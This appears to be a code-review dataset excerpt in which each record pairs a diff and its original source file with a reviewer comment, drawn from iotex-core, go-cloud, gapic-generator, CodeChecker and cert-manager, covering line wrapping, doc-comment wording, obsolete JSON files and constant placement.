nil).AnyTimes() blockchain.EXPECT(). MintNewSecretBlock(gomock.Any(), gomock.Any(), gomock.Any()).Return(secretBlkToMint, nil).AnyTimes() blockchain.EXPECT(). Nonce(gomock.Any()).Return(uint64(0), nil).AnyTimes() if mockChain == nil { candidates := make([]*state.Candidate, 0) for _, delegate := range delegates { candidates = append(candidates, &state.Candidate{Address: delegate}) } blockchain.EXPECT().CandidatesByHeight(gomock.Any()).Return(candidates, nil).AnyTimes() blockchain.EXPECT().TipHeight().Return(uint64(1)).AnyTimes() blockchain.EXPECT().ValidateBlock(gomock.Any(), gomock.Any()).Return(nil).AnyTimes() } else { mockChain(blockchain) } }, func(actPool *mock_actpool.MockActPool) { actPool.EXPECT(). PickActs(). Return([]action.Action{transfer, vote}). AnyTimes() actPool.EXPECT().Reset().AnyTimes() }, func(p2p *mock_network.MockOverlay) { if mockP2P == nil { p2p.EXPECT().Broadcast(gomock.Any(), gomock.Any()).Return(nil).AnyTimes() } else { mockP2P(p2p) } }, clock, ) ctx.epoch.delegates = delegates ctx.epoch.secrets = proposerSecrets ctx.epoch.witness = proposerWitness cfsm, err := newConsensusFSM(ctx) require.Nil(t, err) require.NotNil(t, cfsm) return cfsm } func newTestAddr() *iotxaddress.Address { pk, sk, err := crypto.EC283.NewKeyPair() if err != nil { logger.Panic().Err(err).Msg("error when creating test IoTeX address") } pkHash := keypair.HashPubKey(pk) addr := address.New(config.Default.Chain.ID, pkHash[:]) iotxAddr := iotxaddress.Address{ PublicKey: pk, PrivateKey: sk, RawAddress: addr.IotxAddress(), } return &iotxAddr } func test21Addrs() []*iotxaddress.Address { addrs := make([]*iotxaddress.Address, 0) for i := 0; i < 21; i++ { addrs = append(addrs, newTestAddr()) } return addrs }
1
13,381
This line is 138 characters long; please wrap it to keep within the line-length limit. (A wrapped version is sketched after this record.)
iotexproject-iotex-core
go
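A possible way to keep the mock expectation flagged above within the line-length limit, simply wrapping the arguments of the call added in the patch; behavior is unchanged.

	blockchain.EXPECT().
		MintNewBlockWithActionIterator(
			gomock.Any(), gomock.Any(), gomock.Any(),
			gomock.Any(), gomock.Any()).
		Return(blkToMint, nil).
		AnyTimes()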
@@ -75,8 +75,9 @@ type Params struct { TraceOpts []ocsql.TraceOption } -// Open opens a Cloud SQL database. -func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, error) { +// Open opens a Cloud SQL database. The second return value is a Wire cleanup +// function that calls Close on the returned database. +func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, func(), error) { // TODO(light): Avoid global registry once https://github.com/go-sql-driver/mysql/issues/771 is fixed. dialerCounter.mu.Lock() dialerNum := dialerCounter.n
1
// Copyright 2018 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Package cloudmysql provides connections to managed MySQL Cloud SQL instances. package cloudmysql // import "gocloud.dev/mysql/cloudmysql" import ( "context" "database/sql" "database/sql/driver" "fmt" "sync" "contrib.go.opencensus.io/integrations/ocsql" "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/certs" "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/proxy" "github.com/go-sql-driver/mysql" "gocloud.dev/gcp" "gocloud.dev/gcp/cloudsql" // mysql enables use of the MySQL dialer for the Cloud SQL Proxy. _ "github.com/GoogleCloudPlatform/cloudsql-proxy/proxy/dialers/mysql" ) // CertSourceSet is a Wire provider set that binds a Cloud SQL proxy // certificate source from an GCP-authenticated HTTP client. // // Deprecated: Use cloudsql.CertSourceSet. var CertSourceSet = cloudsql.CertSourceSet // NewCertSource creates a local certificate source that uses the given // HTTP client. The client is assumed to make authenticated requests. // // Deprecated: Use cloudsql.NewCertSource. func NewCertSource(c *gcp.HTTPClient) *certs.RemoteCertSource { return cloudsql.NewCertSource(c) } // Params specifies how to connect to a Cloud SQL database. type Params struct { // ProjectID specifies the GCP project associated with the // CloudSQL instance. ProjectID string // Region is the GCP region containing the CloudSQL instance. Region string // Instance is the CloudSQL instance name. See // https://cloud.google.com/sql/docs/mysql/create-instance // for background. Instance string // User is the username used to connect to the database. User string // Password is the password used to connect to the database. // It may be empty, see https://cloud.google.com/sql/docs/sql-proxy#user Password string // Database is the name of the database to connect to. Database string // TraceOpts contains options for OpenCensus. TraceOpts []ocsql.TraceOption } // Open opens a Cloud SQL database. func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, error) { // TODO(light): Avoid global registry once https://github.com/go-sql-driver/mysql/issues/771 is fixed. dialerCounter.mu.Lock() dialerNum := dialerCounter.n dialerCounter.mu.Unlock() client := &proxy.Client{ Port: 3307, Certs: certSource, } dialerName := fmt.Sprintf("gocloud.dev/mysql/gcpmysql/%d", dialerNum) mysql.RegisterDial(dialerName, client.Dial) cfg := &mysql.Config{ AllowNativePasswords: true, Net: dialerName, Addr: params.ProjectID + ":" + params.Region + ":" + params.Instance, User: params.User, Passwd: params.Password, DBName: params.Database, } return sql.OpenDB(connector{cfg.FormatDSN(), params.TraceOpts}), nil } var dialerCounter struct { mu sync.Mutex n int } type connector struct { dsn string traceOpts []ocsql.TraceOption } func (c connector) Connect(ctx context.Context) (driver.Conn, error) { return c.Driver().Open(c.dsn) } func (c connector) Driver() driver.Driver { return ocsql.Wrap(mysql.MySQLDriver{}, c.traceOpts...) }
1
16,940
Nit: I would leave `Wire` out of the description; the cleanup function is still usable if you don't use Wire. (A reworded version is sketched after this record.)
google-go-cloud
go
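A sketch of how the doc comment could be reworded without mentioning Wire while keeping the new cleanup return value suggested in the patch; the body is taken from the file in this record, with the TODO about the global driver registry omitted for brevity.

// Open opens a Cloud SQL database. The second return value is a cleanup
// function that calls Close on the returned database.
func Open(ctx context.Context, certSource proxy.CertSource, params *Params) (*sql.DB, func(), error) {
	dialerCounter.mu.Lock()
	dialerNum := dialerCounter.n
	dialerCounter.mu.Unlock()
	client := &proxy.Client{
		Port:  3307,
		Certs: certSource,
	}
	dialerName := fmt.Sprintf("gocloud.dev/mysql/gcpmysql/%d", dialerNum)
	mysql.RegisterDial(dialerName, client.Dial)
	cfg := &mysql.Config{
		AllowNativePasswords: true,
		Net:                  dialerName,
		Addr:                 params.ProjectID + ":" + params.Region + ":" + params.Instance,
		User:                 params.User,
		Passwd:               params.Password,
		DBName:               params.Database,
	}
	db := sql.OpenDB(connector{cfg.FormatDSN(), params.TraceOpts})
	return db, func() { db.Close() }, nil
}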
@@ -14,10 +14,14 @@ */ package com.google.api.codegen.transformer.ruby; +import com.google.api.codegen.config.MethodConfig; import com.google.api.codegen.transformer.ApiMethodParamTransformer; import com.google.api.codegen.transformer.MethodTransformerContext; +import com.google.api.codegen.transformer.SurfaceNamer; import com.google.api.codegen.viewmodel.DynamicLangDefaultableParamView; import com.google.api.codegen.viewmodel.ParamDocView; +import com.google.api.codegen.viewmodel.SimpleParamDocView; +import com.google.api.tools.framework.model.Field; import com.google.common.collect.ImmutableList; import java.util.List;
1
/* Copyright 2017 Google Inc * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.api.codegen.transformer.ruby; import com.google.api.codegen.transformer.ApiMethodParamTransformer; import com.google.api.codegen.transformer.MethodTransformerContext; import com.google.api.codegen.viewmodel.DynamicLangDefaultableParamView; import com.google.api.codegen.viewmodel.ParamDocView; import com.google.common.collect.ImmutableList; import java.util.List; public class RubyApiMethodParamTransformer implements ApiMethodParamTransformer { @Override public List<DynamicLangDefaultableParamView> generateMethodParams( MethodTransformerContext context) { // TODO(eoogbe): implement this method when migrating to MVVM return ImmutableList.<DynamicLangDefaultableParamView>of(); } @Override public List<ParamDocView> generateParamDocs(MethodTransformerContext context) { // TODO(eoogbe): implement this method when migrating to MVVM return ImmutableList.<ParamDocView>of(); } }
1
21,351
Nit: each field can be on a separate line to make it visually easier to read.
googleapis-gapic-generator
java
@@ -336,6 +336,7 @@ def get_analysis_statistics(inputs, limits): statistics_files.append(compilation_db) elif inp_f in ['compiler_includes.json', 'compiler_target.json', + 'compiler_info.json', 'metadata.json']: analyzer_file = os.path.join(input_path, inp_f) statistics_files.append(analyzer_file)
1
# ------------------------------------------------------------------------- # The CodeChecker Infrastructure # This file is distributed under the University of Illinois Open Source # License. See LICENSE.TXT for details. # ------------------------------------------------------------------------- """ 'CodeChecker store' parses a list of analysis results and stores them in the database. """ from __future__ import print_function from __future__ import division from __future__ import absolute_import import argparse import base64 import errno import json import os import sys import tempfile import zipfile import zlib from codeCheckerDBAccess_v6.ttypes import StoreLimitKind from shared.ttypes import Permission, RequestFailed, ErrorCode from libcodechecker import logger from libcodechecker import package_context from libcodechecker import host_check from libcodechecker import util from libcodechecker.analyze import plist_parser from libcodechecker.libclient import client as libclient from libcodechecker.output_formatters import twodim_to_str from libcodechecker.util import sizeof_fmt from libcodechecker.util import split_product_url LOG = logger.get_logger('system') MAX_UPLOAD_SIZE = 1 * 1024 * 1024 * 1024 # 1GiB def get_argparser_ctor_args(): """ This method returns a dict containing the kwargs for constructing an argparse.ArgumentParser (either directly or as a subparser). """ return { 'prog': 'CodeChecker store', 'formatter_class': argparse.ArgumentDefaultsHelpFormatter, # Description is shown when the command's help is queried directly 'description': "Store the results from one or more 'codechecker-" "analyze' result files in a database.", # Epilogue is shown after the arguments when the help is queried # directly. 'epilog': "The results can be viewed by connecting to such a server " "in a Web browser or via 'CodeChecker cmd'.", # Help is shown when the "parent" CodeChecker command lists the # individual subcommands. 'help': "Save analysis results to a database." } def add_arguments_to_parser(parser): """ Add the subcommand's arguments to the given argparse.ArgumentParser. """ parser.add_argument('input', type=str, nargs='*', metavar='file/folder', default=os.path.join(util.get_default_workspace(), 'reports'), help="The analysis result files and/or folders " "containing analysis results which should be " "parsed and printed.") parser.add_argument('-t', '--type', '--input-format', dest="input_format", required=False, choices=['plist'], default='plist', help="Specify the format the analysis results were " "created as.") parser.add_argument('-n', '--name', type=str, dest="name", required=False, default=argparse.SUPPRESS, help="The name of the analysis run to use in storing " "the reports to the database. If not specified, " "the '--name' parameter given to 'codechecker-" "analyze' will be used, if exists.") parser.add_argument('--tag', type=str, dest="tag", required=False, default=argparse.SUPPRESS, help="A uniques identifier for this individual store " "of results in the run's history.") parser.add_argument('--trim-path-prefix', type=str, nargs='*', dest="trim_path_prefix", required=False, default=argparse.SUPPRESS, help="Removes leading path from files which will be " "stored. So if you have /a/b/c/x.cpp and " "/a/b/c/y.cpp then by removing \"/a/b/\" prefix " "will store files like c/x.cpp and c/y.cpp. 
" "If multiple prefix is given, the longest match " "will be removed.") parser.add_argument('-f', '--force', dest="force", default=argparse.SUPPRESS, action='store_true', required=False, help="Delete analysis results stored in the database " "for the current analysis run's name and store " "only the results reported in the 'input' files. " "(By default, CodeChecker would keep reports " "that were coming from files not affected by the " "analysis, and only incrementally update defect " "reports for source files that were analysed.)") server_args = parser.add_argument_group( "server arguments", "Specifies a 'CodeChecker server' instance which will be used to " "store the results. This server must be running and listening, and " "the given product must exist prior to the 'store' command being ran.") server_args.add_argument('--url', type=str, metavar='PRODUCT_URL', dest="product_url", default="localhost:8001/Default", required=False, help="The URL of the product to store the " "results for, in the format of " "'[http[s]://]host:port/Endpoint'.") logger.add_verbose_arguments(parser) parser.set_defaults(func=main) def __get_run_name(input_list): """Create a runname for the stored analysis from the input list.""" # Try to create a name from the metada JSON(s). names = [] for input_path in input_list: metafile = os.path.join(input_path, "metadata.json") if os.path.isdir(input_path) and os.path.exists(metafile): metajson = util.load_json_or_empty(metafile) if 'name' in metajson: names.append(metajson['name']) else: names.append("unnamed result folder") if len(names) == 1 and names[0] != "unnamed result folder": return names[0] elif len(names) > 1: return "multiple projects: " + ', '.join(names) else: return False def res_handler(results): """ Summary about the parsing and storage results. """ LOG.info("Finished processing and storing reports.") LOG.info("Failed: " + str(results.count(1)) + "/" + str(len(results))) LOG.info("Successful " + str(results.count(0)) + "/" + str(len(results))) def assemble_zip(inputs, zip_file, client): hash_to_file = {} # There can be files with same hash, # but different path. file_to_hash = {} file_to_mtime = {} missing_source_files = set() def collect_file_hashes_from_plist(plist_file): """ Collects file content hashes and last modification times of files which can be found in the given plist file. :returns List of file paths which are in the processed plist file but missing from the user's disk. """ missing_files = [] try: files, _ = plist_parser.parse_plist(plist_file) for f in files: if not os.path.isfile(f): missing_files.append(f) missing_source_files.add(f) continue content_hash = util.get_file_content_hash(f) hash_to_file[content_hash] = f file_to_hash[f] = content_hash file_to_mtime[f] = util.get_last_mod_time(f) return missing_files except Exception as ex: LOG.error('Parsing the plist failed: ' + str(ex)) plist_report_files = [] changed_files = set() for input_path in inputs: input_path = os.path.abspath(input_path) if not os.path.exists(input_path): raise OSError(errno.ENOENT, "Input path does not exist", input_path) if os.path.isfile(input_path): files = [input_path] else: _, _, files = next(os.walk(input_path), ([], [], [])) for f in files: plist_file = os.path.join(input_path, f) if f.endswith(".plist"): missing_files = collect_file_hashes_from_plist(plist_file) if not missing_files: LOG.debug( "Copying file '{0}' to ZIP assembly dir..." 
.format(plist_file)) plist_report_files.append(os.path.join(input_path, f)) else: LOG.warning("Skipping '%s' because it refers " "the following missing source files: %s", plist_file, missing_files) elif f == 'metadata.json': plist_report_files.append(os.path.join(input_path, f)) elif f == 'skip_file': plist_report_files.append(os.path.join(input_path, f)) plist_mtime = util.get_last_mod_time(plist_file) for k, v in file_to_mtime.items(): if v > plist_mtime: changed_files.add(k) if changed_files: changed_files = '\n'.join([' - ' + f for f in changed_files]) LOG.warning("The following source file contents changed since the " "latest analysis:\n{0}\nPlease analyze your project " "again to update the reports!".format(changed_files)) sys.exit(1) with zipfile.ZipFile(zip_file, 'a', allowZip64=True) as zipf: for pl in plist_report_files: _, plist_filename = os.path.split(pl) zip_target = os.path.join('reports', plist_filename) zipf.write(pl, zip_target) if len(hash_to_file) == 0: LOG.warning("There is no report to store. After uploading these " "results the previous reports become resolved.") file_hashes = hash_to_file.keys() necessary_hashes = client.getMissingContentHashes(file_hashes) \ if file_hashes else [] for f, h in file_to_hash.items(): if h in necessary_hashes: LOG.debug("File contents for '{0}' needed by the server" .format(f)) zipf.write(f, os.path.join('root', f.lstrip('/'))) zipf.writestr('content_hashes.json', json.dumps(file_to_hash)) # Compressing .zip file with open(zip_file, 'rb') as source: compressed = zlib.compress(source.read(), zlib.Z_BEST_COMPRESSION) with open(zip_file, 'wb') as target: target.write(compressed) LOG.debug("[ZIP] Mass store zip written at '{0}'".format(zip_file)) if missing_source_files: LOG.warning("Missing source files: \n%s", '\n'.join( map(lambda f_: " - " + f_, missing_source_files))) def get_analysis_statistics(inputs, limits): """ Collects analysis statistics information and returns them. 
""" statistics_files = [] for input_path in inputs: input_path = os.path.abspath(input_path) if not os.path.exists(input_path): raise OSError(errno.ENOENT, "Input path does not exist", input_path) dirs = [] if os.path.isfile(input_path): files = [input_path] else: _, dirs, files = next(os.walk(input_path), ([], [], [])) for inp_f in files: if inp_f == 'compile_cmd.json': compilation_db = os.path.join(input_path, inp_f) compilation_db_size = \ limits.get(StoreLimitKind.COMPILATION_DATABASE_SIZE) if os.stat(compilation_db).st_size > compilation_db_size: LOG.debug("Compilation database is too big (max: %s).", sizeof_fmt(compilation_db_size)) else: LOG.debug("Copying file '%s' to analyzer statistics " "ZIP...", compilation_db) statistics_files.append(compilation_db) elif inp_f in ['compiler_includes.json', 'compiler_target.json', 'metadata.json']: analyzer_file = os.path.join(input_path, inp_f) statistics_files.append(analyzer_file) for inp_dir in dirs: if inp_dir == 'failed': failure_zip_limit = limits.get(StoreLimitKind.FAILURE_ZIP_SIZE) failed_dir = os.path.join(input_path, inp_dir) _, _, files = next(os.walk(failed_dir), ([], [], [])) failed_files_size = 0 for f in files: failure_zip = os.path.join(failed_dir, f) failure_zip_size = os.stat(failure_zip).st_size failed_files_size += failure_zip_size if failed_files_size > failure_zip_limit: LOG.debug("We reached the limit of maximum uploadable " "failure zip size (max: %s).", sizeof_fmt(failure_zip_limit)) break else: LOG.debug("Copying failure zip file '%s' to analyzer " "statistics ZIP...", failure_zip) statistics_files.append(failure_zip) return statistics_files def storing_analysis_statistics(client, inputs, run_name): """ Collects and stores analysis statistics information on the server. """ _, zip_file = tempfile.mkstemp('.zip') LOG.debug("Will write failed store ZIP to '%s'...", zip_file) try: limits = client.getAnalysisStatisticsLimits() statistics_files = get_analysis_statistics(inputs, limits) if not statistics_files: LOG.debug("No analyzer statistics information can be found in the " "report directory.") return False # Write statistics files to the ZIP file. with zipfile.ZipFile(zip_file, 'a', allowZip64=True) as zipf: for stat_file in statistics_files: zipf.write(stat_file) # Compressing .zip file with open(zip_file, 'rb') as source: compressed = zlib.compress(source.read(), zlib.Z_BEST_COMPRESSION) with open(zip_file, 'wb') as target: target.write(compressed) LOG.debug("[ZIP] Analysis statistics zip written at '%s'", zip_file) with open(zip_file, 'rb') as zf: b64zip = base64.b64encode(zf.read()) # Store analysis statistics on the server return client.storeAnalysisStatistics(run_name, b64zip) except Exception as ex: LOG.debug("Storage of analysis statistics zip has been failed: %s", ex) finally: os.remove(zip_file) def main(args): """ Store the defect results in the specified input list as bug reports in the database. """ logger.setup_logger(args.verbose if 'verbose' in args else None) if not host_check.check_zlib(): raise Exception("zlib is not available on the system!") # To ensure the help message prints the default folder properly, # the 'default' for 'args.input' is a string, not a list. # But we need lists for the foreach here to work. 
if isinstance(args.input, str): args.input = [args.input] if 'name' not in args: LOG.debug("Generating name for analysis...") generated = __get_run_name(args.input) if generated: setattr(args, 'name', generated) else: LOG.error("No suitable name was found in the inputs for the " "analysis run. Please specify one by passing argument " "--name run_name in the invocation.") sys.exit(2) # argparse returns error code 2 for bad invocations. LOG.info("Storing analysis results for run '" + args.name + "'") if 'force' in args: LOG.info("argument --force was specified: the run with name '" + args.name + "' will be deleted.") protocol, host, port, product_name = split_product_url(args.product_url) # Before any transmission happens, check if we have the PRODUCT_STORE # permission to prevent a possibly long ZIP operation only to get an # error later on. product_client = libclient.setup_product_client(protocol, host, port, product_name) product_id = product_client.getCurrentProduct().id auth_client, _ = libclient.setup_auth_client(protocol, host, port) has_perm = libclient.check_permission( auth_client, Permission.PRODUCT_STORE, {'productID': product_id}) if not has_perm: LOG.error("You are not authorised to store analysis results in " "product '{0}'".format(product_name)) sys.exit(1) # Setup connection to the remote server. client = libclient.setup_client(args.product_url, product_client=False) LOG.debug("Initializing client connecting to {0}:{1}/{2} done." .format(host, port, product_name)) _, zip_file = tempfile.mkstemp('.zip') LOG.debug("Will write mass store ZIP to '{0}'...".format(zip_file)) try: assemble_zip(args.input, zip_file, client) if os.stat(zip_file).st_size > MAX_UPLOAD_SIZE: LOG.error("The result list to upload is too big (max: {})." .format(sizeof_fmt(MAX_UPLOAD_SIZE))) sys.exit(1) with open(zip_file, 'rb') as zf: b64zip = base64.b64encode(zf.read()) context = package_context.get_context() trim_path_prefixes = args.trim_path_prefix if \ 'trim_path_prefix' in args else None client.massStoreRun(args.name, args.tag if 'tag' in args else None, str(context.version), b64zip, 'force' in args, trim_path_prefixes) # Storing analysis statistics if the server allows them. if client.allowsStoringAnalysisStatistics(): storing_analysis_statistics(client, args.input, args.name) LOG.info("Storage finished successfully.") except RequestFailed as reqfail: if reqfail.errorCode == ErrorCode.SOURCE_FILE: header = ['File', 'Line', 'Checker name'] table = twodim_to_str('table', header, [c.split('|') for c in reqfail.extraInfo]) LOG.warning("Setting the review statuses for some reports failed " "because of non valid source code comments: " "{0}\n {1}".format(reqfail.message, table)) sys.exit(1) except Exception as ex: LOG.info("Storage failed: " + str(ex)) sys.exit(1) finally: os.remove(zip_file)
1
10,108
Do we still have these files? Shouldn't we remove these?
Ericsson-codechecker
c
@@ -22,6 +22,11 @@ import ( "github.com/jetstack/cert-manager/pkg/apis/certmanager/v1alpha1" ) + const ( + // Error reason generated when duration or renewBefore is invalid + ErrorDurationInvalid = "ErrDurationInvalid" +) + type Interface interface { // Setup initialises the issuer. This may include registering accounts with // a service, creating a CA and storing it somewhere, or verifying
1
/* Copyright 2018 The Jetstack cert-manager contributors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package issuer import ( "context" "github.com/jetstack/cert-manager/pkg/apis/certmanager/v1alpha1" ) type Interface interface { // Setup initialises the issuer. This may include registering accounts with // a service, creating a CA and storing it somewhere, or verifying // credentials and authorization with a remote server. Setup(ctx context.Context) (SetupResponse, error) // Issue attempts to issue a certificate as described by the certificate // resource given Issue(context.Context, *v1alpha1.Certificate) (IssueResponse, error) } type IssueResponse struct { // If Requeue is true, the Certificate will be requeued for processing // after applying the controllers rate limit. Requeue bool // Certificate is the certificate resource that should be stored in the // target secret. // It will only be set if the corresponding private key is also set on the // IssuerResponse structure. Certificate []byte // PrivateKey is the private key that should be stored in the target secret. // If set, the certificate and CA field will also be overwritten with the // contents of the field. // If Certificate is not set, the existing Certificate will be overwritten. PrivateKey []byte // CA is the CA certificate that should be stored in the target secret. // This field should only be set if the private key field is set, similar // to the Certificate field. CA []byte } type SetupResponse struct { // If Requeue is true, the Certificate will be requeued for processing // after applying the controllers rate limit. Requeue bool }
1
13,784
A lot of things to do with constants seem to have moved since the original commit, so I stuck this here. Is there a better place for it?
jetstack-cert-manager
go
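For the placement question above, a minimal sketch, assuming the reason string stays in the issuer package as the diff places it: one common option is to group it with any other condition-reason strings in a single const block near the Interface definition. The extra ErrorPending name below is hypothetical and is included only to illustrate the grouping.

package issuer

const (
	// ErrorDurationInvalid is the reason generated when duration or
	// renewBefore is invalid (taken from the diff).
	ErrorDurationInvalid = "ErrDurationInvalid"

	// ErrorPending is a hypothetical second reason, shown only to
	// demonstrate keeping related reason strings together in one block.
	ErrorPending = "ErrPending"
)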
@@ -171,7 +171,9 @@ var ( RepeatDecayStep: 1, }, Dispatcher: Dispatcher{ - EventChanSize: 10000, + ActionChanSize: 1000, + BlockChanSize: 1000, + BlockSyncChanSize: 10, }, API: API{ UseRDS: false,
1
// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package config import ( "crypto/ecdsa" "flag" "math/big" "os" "strings" "sync" "sync/atomic" "time" "github.com/iotexproject/go-p2p" "github.com/iotexproject/go-pkgs/crypto" "github.com/iotexproject/iotex-election/committee" "github.com/pkg/errors" uconfig "go.uber.org/config" "go.uber.org/zap" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-core/blockchain/genesis" "github.com/iotexproject/iotex-core/pkg/log" "github.com/iotexproject/iotex-core/pkg/unit" ) // IMPORTANT: to define a config, add a field or a new config type to the existing config types. In addition, provide // the default value in Default var. func init() { flag.StringVar(&_overwritePath, "config-path", "", "Config path") flag.StringVar(&_secretPath, "secret-path", "", "Secret path") flag.StringVar(&_subChainPath, "sub-config-path", "", "Sub chain Config path") flag.Var(&_plugins, "plugin", "Plugin of the node") } var ( // overwritePath is the path to the config file which overwrite default values _overwritePath string // secretPath is the path to the config file store secret values _secretPath string _subChainPath string _plugins strs _evmNetworkID uint32 loadChainID sync.Once ) const ( // RollDPoSScheme means randomized delegated proof of stake RollDPoSScheme = "ROLLDPOS" // StandaloneScheme means that the node creates a block periodically regardless of others (if there is any) StandaloneScheme = "STANDALONE" // NOOPScheme means that the node does not create only block NOOPScheme = "NOOP" ) const ( // GatewayPlugin is the plugin of accepting user API requests and serving blockchain data to users GatewayPlugin = iota ) type strs []string func (ss *strs) String() string { return strings.Join(*ss, ",") } func (ss *strs) Set(str string) error { *ss = append(*ss, str) return nil } // Dardanelles consensus config const ( DardanellesUnmatchedEventTTL = 2 * time.Second DardanellesUnmatchedEventInterval = 100 * time.Millisecond DardanellesAcceptBlockTTL = 2 * time.Second DardanellesAcceptProposalEndorsementTTL = time.Second DardanellesAcceptLockEndorsementTTL = time.Second DardanellesCommitTTL = time.Second DardanellesBlockInterval = 5 * time.Second DardanellesDelay = 2 * time.Second SigP256k1 = "secp256k1" SigP256sm2 = "p256sm2" ) var ( // Default is the default config Default = Config{ Plugins: make(map[int]interface{}), SubLogs: make(map[string]log.GlobalConfig), Network: Network{ Host: "0.0.0.0", Port: 4689, ExternalHost: "", ExternalPort: 4689, BootstrapNodes: []string{}, MasterKey: "", RateLimit: p2p.DefaultRatelimitConfig, EnableRateLimit: true, PrivateNetworkPSK: "", }, Chain: Chain{ ChainDBPath: "/var/data/chain.db", TrieDBPath: "/var/data/trie.db", IndexDBPath: "/var/data/index.db", BloomfilterIndexDBPath: "/var/data/bloomfilter.index.db", CandidateIndexDBPath: "/var/data/candidate.index.db", StakingIndexDBPath: "/var/data/staking.index.db", ID: 1, EVMNetworkID: 4689, Address: "", ProducerPrivKey: generateRandomKey(SigP256k1), SignatureScheme: []string{SigP256k1}, EmptyGenesis: false, GravityChainDB: DB{DbPath: "/var/data/poll.db", NumRetries: 10}, 
Committee: committee.Config{ GravityChainAPIs: []string{}, }, EnableTrielessStateDB: true, EnableStateDBCaching: false, EnableArchiveMode: false, EnableAsyncIndexWrite: true, EnableSystemLogIndexer: false, EnableStakingProtocol: true, EnableStakingIndexer: false, CompressBlock: false, AllowedBlockGasResidue: 10000, MaxCacheSize: 0, PollInitialCandidatesInterval: 10 * time.Second, StateDBCacheSize: 1000, WorkingSetCacheSize: 20, }, ActPool: ActPool{ MaxNumActsPerPool: 32000, MaxGasLimitPerPool: 320000000, MaxNumActsPerAcct: 2000, ActionExpiry: 10 * time.Minute, MinGasPriceStr: big.NewInt(unit.Qev).String(), BlackList: []string{}, }, Consensus: Consensus{ Scheme: StandaloneScheme, RollDPoS: RollDPoS{ FSM: ConsensusTiming{ UnmatchedEventTTL: 3 * time.Second, UnmatchedEventInterval: 100 * time.Millisecond, AcceptBlockTTL: 4 * time.Second, AcceptProposalEndorsementTTL: 2 * time.Second, AcceptLockEndorsementTTL: 2 * time.Second, CommitTTL: 2 * time.Second, EventChanSize: 10000, }, ToleratedOvertime: 2 * time.Second, Delay: 5 * time.Second, ConsensusDBPath: "/var/data/consensus.db", }, }, BlockSync: BlockSync{ Interval: 30 * time.Second, ProcessSyncRequestTTL: 10 * time.Second, BufferSize: 200, IntervalSize: 20, MaxRepeat: 3, RepeatDecayStep: 1, }, Dispatcher: Dispatcher{ EventChanSize: 10000, }, API: API{ UseRDS: false, Port: 14014, TpsWindow: 10, GasStation: GasStation{ SuggestBlockWindow: 20, DefaultGas: uint64(unit.Qev), Percentile: 60, }, RangeQueryLimit: 1000, }, System: System{ Active: true, HeartbeatInterval: 10 * time.Second, HTTPStatsPort: 8080, HTTPAdminPort: 9009, StartSubChainInterval: 10 * time.Second, SystemLogDBPath: "/var/data/systemlog.db", }, DB: DB{ NumRetries: 3, MaxCacheSize: 64, BlockStoreBatchSize: 16, V2BlocksToSplitDB: 1000000, Compressor: "Snappy", CompressLegacy: false, SplitDBSizeMB: 0, SplitDBHeight: 900000, HistoryStateRetention: 2000, }, Indexer: Indexer{ RangeBloomFilterNumElements: 100000, RangeBloomFilterSize: 1200000, RangeBloomFilterNumHash: 8, }, Genesis: genesis.Default, } // ErrInvalidCfg indicates the invalid config value ErrInvalidCfg = errors.New("invalid config value") // Validates is the collection config validation functions Validates = []Validate{ ValidateRollDPoS, ValidateArchiveMode, ValidateDispatcher, ValidateAPI, ValidateActPool, ValidateForkHeights, } ) // Network is the config struct for network package type ( Network struct { Host string `yaml:"host"` Port int `yaml:"port"` ExternalHost string `yaml:"externalHost"` ExternalPort int `yaml:"externalPort"` BootstrapNodes []string `yaml:"bootstrapNodes"` MasterKey string `yaml:"masterKey"` // master key will be PrivateKey if not set. // RelayType is the type of P2P network relay. By default, the value is empty, meaning disabled. Two relay types // are supported: active, nat. 
